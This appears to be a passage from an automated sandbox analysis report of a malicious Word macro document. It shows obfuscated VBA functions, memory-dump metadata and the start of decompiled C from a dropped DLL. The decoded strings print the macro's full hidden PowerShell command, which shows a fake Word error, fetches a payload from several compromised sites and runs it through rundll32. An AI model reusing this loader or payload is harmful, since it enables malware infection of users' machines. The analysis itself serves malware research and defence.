225	NuebA.Close	Close Close Close Close Close
226	Set sTzDC = Nothing
227	Set KXwaABT = zBSWCKmJv	zBSWCKmJv zBSWCKmJv zBSWCKmJv zBSWCKmJv zBSWCKmJv
228	Set NuebA = Nothing
228	NuebA:
230	Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9)
231	Goto gxBPJB
232	Dim zxgLHJSFW as Object
233	Set quDoH = KXTliE	KXTliE KXTliE KXTliE KXTliE KXTliE
234	Set zxgLHJSFW = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
235	Dim gxBPJB as Object
236	Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
237	gxBPJB.WriteLine "RhnJRGeBNASBQHHGF"	WriteLine WriteLine WriteLine WriteLine WriteLine
238	gxBPJB.WriteLine "WNFUDvHgghFdup"	WriteLine WriteLine WriteLine WriteLine WriteLine
239	gxBPJB.WriteLine "eeVVJBMGlcfXMB"	WriteLine WriteLine WriteLine WriteLine WriteLine
240	Set nleaHR = YZllAeRe	YZllAeRe YZllAeRe YZllAeRe YZllAeRe YZllAeRe
241	gxBPJB.Close	Close Close Close Close Close
242	Set zxgLHJSFW = Nothing
243	Set mgTNFCq = hjZwD	hjZwD hjZwD hjZwD hjZwD hjZwD
244	Set gxBPJB = Nothing
244	gxBPJB:
246	Jlda77h_v8nx5 = Gnc9qzz9241pnhfi
247	Goto mgrwfmN
248	Dim RjiQHRA as Object
249	Set EhCMG = FUyIHBDFz	FUyIHBDFz FUyIHBDFz FUyIHBDFz FUyIHBDFz FUyIHBDFz
250	Set RjiQHRA = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject CreateObject CreateObject CreateObject CreateObject
251	Dim mgrwfmN as Object
252	Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")	CreateTextFile CreateTextFile CreateTextFile CreateTextFile CreateTextFile
253	mgrwfmN.WriteLine "ptABFEZDmkMVIeD"	WriteLine WriteLine WriteLine WriteLine WriteLine
254	mgrwfmN.WriteLine "vVbvIHcFGEAJJ"	WriteLine WriteLine WriteLine WriteLine WriteLine
255	mgrwfmN.WriteLine "NisSEYrcDlKQUITa"	WriteLine WriteLine WriteLine WriteLine WriteLine
256	Set MNihxICY = AiRdGDAJ	AiRdGDAJ AiRdGDAJ AiRdGDAJ AiRdGDAJ AiRdGDAJ
257	mgrwfmN.Close	Close Close Close Close Close
258	Set RjiQHRA = Nothing
259	Set wTMSLyWFG = AioOpBFE	AioOpBFE AioOpBFE AioOpBFE AioOpBFE AioOpBFE
260	Set mgrwfmN = Nothing
260	mgrwfmN:
262	End Function

Function Hrs2a1p95u19, APIs: 93, Strings: 11, Number of lines: 34, Relevance: 216.034

APIs	Meta Information
Pg5minli2d3c9
sreXHFD
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
eCIzUDyJ
Close
yJmmmVIAG
Replace	Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process Replace("]anw[3]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3c]anw[3m]anw[3d]anw[3 ]anw[3/]anw[3c]anw[3 ]anw[3m]anw[3s]anw[3g]anw[3 ]anw[3%]anw[3u]anw[3s]anw[3e]anw[3r]anw[3n]anw[3a]anw[3m]anw[3e]anw[3%]anw[3 ]anw[3/]anw[3v]anw[3 ]anw[3W]anw[3o]anw[3r]anw[3d]anw[3 ]anw[3e]anw[3x]anw[3p]anw[3e]anw[3r]anw[3i]anw[3e]anw[3n]anw[3c]anw[3e]anw[3d]anw[3 ]anw[3a]anw[3n]anw[3 ]anw[3e]anw[3r]anw[3r]anw[3o]anw[3r]anw[3 ]anw[3t]anw[3r]anw[3y]anw[3i]anw[3n]anw[3g]anw[3 ]anw[3t]anw[3o]anw[3 ]anw[3o]anw[3p]anw[3e]anw[3n]anw[3 ]anw[3t]anw[3h]anw[3e]anw[3 ]anw[3f]anw[3i]anw[3l]anw[3e]anw[3.]anw[3 ]anw[3&]anw[3 ]anw[3 ]anw[3P]anw[3^]anw[3O]anw[3w]anw[3^]anw[3e]anw[3r]anw[3^]anw[3s]anw[3h]anw[3e]anw[3^]anw[3L]anw[3^]anw[3L]anw[3 ]anw[3-]anw[3w]anw[3 ]anw[3h]anw[3i]anw[3d]anw[3d]anw[3e]anw[3n]anw[3 ]anw[3-]anw[3E]anw[3N]anw[3C]anw[3O]anw[3D]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 ]anw[3 IAB]anw[3zAF]anw[3YAI]anw[3AAg]anw[3ACg]anw[3AIg]anw[3BLA]anw[3CIA]anw[3KwA]anw[3iAD]anw[3QAN]anw[3wBk]anw[3ACI]anw[3AKQ]anw[3AgA]anw[3CAA]anw[3KAB]anw[3bAH]anw[3QAW]anw[3QBQ]anw[3AGU]anw[3AXQ]anw[3AoA]anw[3CIA]anw[3ewA]anw[30AH]anw[30Ae]anw[3wAx]anw[3AH0]anw[3Aew]anw[3AwA]anw[3H0A]anw[3ewA]anw[3zAH]anw[30Ae]anw[3wAy]anw[3AH0]anw[3AIg]anw[3AtA]anw[3EYA]anw[3JwB]anw[3zAC]anw[3cAL]anw[3AAn]anw[3AHk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3ZQB]anw[3jAF]anw[3QAb]anw[3wBy]anw[3AFk]anw[3AJw]anw[3AsA]anw[3CcA]anw[3VAB]anw[3FAG]anw[30AL]anw[3gBJ]anw[3AG8]anw[3ALg]anw[3BEA]anw[3EkA]anw[3cgA]anw[3nAC]anw[3wAJ]anw[3wBz]anw[3ACc]anw[3AKQ]anw[3ApA]anw[3CAA]anw[3IAA]anw[37AC]anw[3AAI]anw[3AAg]anw[3ACA]anw[3AJA]anw[3BXA]anw[3GkA]anw[3OAA]anw[3gAD]anw[30AW]anw[3wB0]anw[3AHk]anw[3AUA]anw[3BlA]anw[3F0A]anw[3KAA]anw[3iAH]anw[3sAM]anw[3gB9]anw[3AHs]anw[3AMw]anw[3B9A]anw[3HsA]anw[3NwB]anw[39AH]anw[3sAM]anw[3QB9]anw[3AHs]anw[3ANA]anw[3B9A]anw[3HsA]anw[3NgB]anw[39AH]anw[3sAN]anw[3QB9]anw[3AHs]anw[3AOA]anw[3B9A]anw[3HsA]anw[3MAB]anw[39AC]anw[3IAL]anw[3QBG]anw[3ACA]anw[3AJw]anw[3BnA]anw[3EUA]anw[3UgA]anw[3nAC]anw[3wAJ]anw[3wAu]anw[3AE4]anw[3AZQ]anw[3B0A]anw[3C4A]anw[3UwB]anw[3FAF]anw[3IAV]anw[3gAn]anw[3ACw]anw[3AJw]anw[3BTA]anw[3FkA]anw[3cwA]anw[3nAC]anw[3wAJ]anw[3wBU]anw[3AGU]anw[3AJw]anw[3AsA]anw[3CcA]anw[3SQA]anw[3nAC]anw[3wAJ]anw[3wB0]anw[3AG0]anw[3AQQ]anw[3AnA]anw[3CwA]anw[3JwB]anw[3DAG]anw[3UAU]anw[3ABP]anw[3AEk]anw[3ATg]anw[3AnA]anw[3CwA]anw[3JwB]anw[3tAC]anw[3cAL]anw[3AAn]anw[3AE4]anw[3AYQ]anw[3AnA]anw[3CkA]anw[3IAA]anw[37AC]anw[3AAJ]anw[3ABF]anw[3AHI]anw[3Acg]anw[3BvA]anw[3HIA]anw[3QQB]anw[3jAH]anw[3QAa]anw[3QBv]anw[3AG4]anw[3AUA]anw[3ByA]anw[3GUA]anw[3ZgB]anw[3lAH]anw[3IAZ]anw[3QBu]anw[3AGM]anw[3AZQ]anw[3AgA]anw[3D0A]anw[3IAA]anw[3oAC]anw[3gAJ]anw[3wBT]anw[3AGk]anw[3AbA]anw[3BlA]anw[3G4A]anw[3dAA]anw[3nAC]anw[3sAJ]anw[3wBs]anw[3AHk]anw[3AJw]anw[3ApA]anw[3CsA]anw[3JwB]anw[3DAC]anw[3cAK]anw[3wAo]anw[3ACc]anw[3Abw]anw[3BuA]anw[3CcA]anw[3KwA]anw[3nAH]anw[3QAa]anw[3QAn]anw[3ACk]anw[3AKw]anw[3AnA]anw[3G4A]anw[3JwA]anw[3rAC]anw[3cAd]anw[3QBl]anw[3ACc]anw[3AKQ]anw[3A7A]anw[3CQA]anw[3TwB]anw[3sAD]anw[3kAb]anw[3wBu]anw[3AGs]anw[3AaQ]anw[3A9A]anw[3CQA]anw[3QwA]anw[3wAD]anw[3IAV]anw[3wAg]anw[3ACs]anw[3AIA]anw[3BbA]anw[3GMA]anw[3aAB]anw[3hAH]anw[3IAX]anw[3QAo]anw[3ADY]anw[3ANA]anw[3ApA]anw[3CAA]anw[3KwA]anw[3gAC]anw[3QAQ]anw[3QAw]anw[3ADM]anw[3AUA]anw[3A7A]anw[3CQA]anw[3SAA]anw[3yAD]anw[3cAW]anw[3AA9]anw[3ACg]anw[3AJw]anw[3BJA]anw[3CcA]anw[3KwA]anw[3oAC]anw[3cAN]anw[3gAn]anw[3ACs]anw[3AJw]anw[3A3A]anw[3FEA]anw[3JwA]anw[3pAC]anw[3kAO]anw[3wAg]anw[3ACA]anw[3AKA]anw[3BnA]anw[3GkA]anw[3IAA]anw[3oAC]anw[3IAV]anw[3gBh]anw[3AFI]anw[3AIg]anw[3ArA]anw[3CIA]anw[3aQB]anw[3BAE]anw[3IAT]anw[3ABl]anw[3ADo]anw[3Aaw]anw[3AiA]anw[3CsA]anw[3IgA]anw[30AD]anw[3cAZ]anw[3AAi]anw[3ACk]anw[3AIA]anw[3AgA]anw[3CkA]anw[3LgB]anw[32AG]anw[3EAT]anw[3AB1]anw[3AGU]anw[3AOg]anw[3A6A]anw[3CIA]anw[3QwB]anw[3yAE]anw[3UAY]anw[3ABB]anw[3AGA]anw[3AVA]anw[3BgA]anw[3EUA]anw[3RAB]anw[3JAF]anw[3IAZ]anw[3QBD]anw[3AFQ]anw[3AYA]anw[3BPA]anw[3FIA]anw[3eQA]anw[3iAC]anw[3gAJ]anw[3ABI]anw[3AE8]anw[3ATQ]anw[3BFA]anw[3CAA]anw[3KwA]anw[3gAC],"]anw[3",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAKwAnAC8AJwArACcAQAAnACsAKAAnAF0AYQAnACsAJwBuACcAKQArACcAdwAnACsAKAAnAFsAMwA6ACcAKwAnAC8ALwBzAGgAJwArACcAbwBwACcAKwAnAC4AJwApACsAJwBlAGwAJwArACcAZQAnACsAKAAnAG0AZQBuACcAKwAnAHMAbAAnACsAJwBpACcAKQArACgAJwBkACcAKwAnAGUALgAnACkAKwAoACcAYwBvAG0AJwArACcALwAnACkAKwAnAHcAcAAnACsAJwAtAGMAJwArACcAbwAnACsAKAAnAG4AJwArACcAdABlAG4AdAAnACkAKwAoACcALwAnACsAJwBuAC8AJwArACcAQABdAGEAbgAnACkAKwAoACcAdwBbADMAJwArACcAOgAvAC8AJwApACsAJwBrACcAKwAoACcAaAAnACsAJwBhAG4AJwApACsAKAAnAGgAJwArACcAaABvACcAKQArACgAJwBhAGgAbwAnACsAJwBtACcAKQArACgAJwBuAGEAeQAuAG4AZQAnACsAJwB0AC8AJwArACcAdwBvAHIAZABwACcAKQArACgAJwByAGUAJwArACcAcwAnACkAKwAoACcAcwAvACcAKwAnAEMAJwApACsAKAAnAEcATQBDAC8AQAAnACsAJwBdACcAKQArACcAYQBuACcAKwAnAHcAJwArACgAJwBbADMAOgAvACcAKwAnAC8AJwApACsAKAAnAGMAYQAnACsAJwBtACcAKQArACgAJwBwAHUAJwArACcAcwBlACcAKwAnAHgAcABvACcAKwAnAC4AbwByAGcALwBkAGUAJwApACsAJwBwACcAKwAoACcAYQByACcAKwAnAHQAbQBlAG4AJwApACsAJwB0ACcAKwAoACcALQAnACsAJwBvAGYALQBvAGQAaABtACcAKQArACgAJwBtAGsAZAAvADkANQBlAFgAJwArACcAWgAnACsAJwBZACcAKQArACgAJwAvAEAAXQBhAG4AdwBbACcAKwAnADMAcwA6AC8ALwBnACcAKwAnAHUAcgAn
Ij2hesgjee57d3s0
uVItICICB
CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close
Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE
CreateTextFile
WriteLine
WriteLine
WriteLine
anyPG
Close
YVZXECEHD

Strings	Decrypted Strings
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs"
"CcDmClHsnCC"
"aqGiHISIbAoabV"
"nJJzFRjEWpRikxCD"
"]a""nw[3"
"]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"
"QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD"
"syYTHJShrguhzb"
"TubioGUTLadgXbA"
"oLweAMoGsqVE"

Line	Instruction	Meta Information
263	Function Hrs2a1p95u19(Svk60sycz63sk)
264	Q491417n8n1 = Pg5minli2d3c9	Pg5minli2d3c9 executed
265	Goto uWZkeMFv
266	Dim zDsRaIBGF as Object
267	Set ViWsSIH = sreXHFD	sreXHFD
268	Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
269	Dim uWZkeMFv as Object
270	Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")	CreateTextFile
271	uWZkeMFv.WriteLine "CcDmClHsnCC"	WriteLine
272	uWZkeMFv.WriteLine "aqGiHISIbAoabV"	WriteLine
273	uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"	WriteLine
274	Set QOrvJEB = eCIzUDyJ	eCIzUDyJ
275	uWZkeMFv.Close	Close
276	Set zDsRaIBGF = Nothing
277	Set UskmBJF = yJmmmVIAG	yJmmmVIAG
278	Set uWZkeMFv = Nothing
278	uWZkeMFv:
280	Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)	Replace("w]anw[3in]anw[3m]anw[3gm]anw[3t]anw[3]anw[3]anw[3]anw[3s]anw[3]anw[3]anw[3:w]anw[3]anw[3in]anw[33]anw[32]anw[3_]anw[3]anw[3p]anw[3]anw[3ro]anw[3]anw[3ce]anw[3s]anw[3s]anw[3]anw[3","]anw[3",) -> winmgmts:win32_process Ij2hesgjee57d3s0 executed
281	Goto iHKuDmaEr
282	Dim OMZxxg as Object
283	Set drZcHkCm = uVItICICB	uVItICICB
284	Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))	CreateObject
285	Dim iHKuDmaEr as Object
286	Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")	CreateTextFile
287	iHKuDmaEr.WriteLine "syYTHJShrguhzb"	WriteLine
288	iHKuDmaEr.WriteLine "TubioGUTLadgXbA"	WriteLine
289	iHKuDmaEr.WriteLine "oLweAMoGsqVE"	WriteLine
290	Set noebIvSiu = anyPG	anyPG
291	iHKuDmaEr.Close	Close
292	Set OMZxxg = Nothing
293	Set NXbmIuHX = YVZXECEHD	YVZXECEHD
294	Set iHKuDmaEr = Nothing
294	iHKuDmaEr:
296	End Function

Module: Zdjtk46nm17voo

Declaration

Line	Content
1	Attribute VB_Name = "Zdjtk46nm17voo"

Reset < >

Analysis Process: powershell.exe PID: 1692 Parent PID: 2436 powershell.exeCOMMON

Executed Functions

Function 000007FF002608C0, Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2118970020.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9e19dc3d16bd3b12a34769733de1fbd3d81a5ab3ee35f7ba7fd031f25283811
Instruction ID: a6ac1b9f8d6645ed33166fa64101e042e3611a369bcec6f256cf2291a6ebe41a
Opcode Fuzzy Hash: e9e19dc3d16bd3b12a34769733de1fbd3d81a5ab3ee35f7ba7fd031f25283811
Instruction Fuzzy Hash: 9141B16194E7C28FDB5787349CA52917FB0AF17204F1A04EBD4C4CF1B3E918999AD362

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF0026249A, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2118970020.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f083789d5be7d4dd8b3506152826d94ed70e3682f88fd3c092429cbd61ab1468
Instruction ID: 3a79322be79191e24ea552a3b8aca3dd2701b460518a57f577abe19502ed1a13
Opcode Fuzzy Hash: f083789d5be7d4dd8b3506152826d94ed70e3682f88fd3c092429cbd61ab1468
Instruction Fuzzy Hash: 0EE0201071DC0B4FFB94666C641A3B473C1E794353F500076F80CC2293DD1DD9448381

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 1204 Parent PID: 2564 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	45.7%
Signature Coverage:	25.3%
Total number of Nodes:	1930
Total number of Limit Nodes:	13

Executed Functions

Function 00242C63, Relevance: 54.9, Strings: 43, Instructions: 1125
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00242C63() {
				char _v68;
				signed int _v72;
				char _v80;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _v112;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
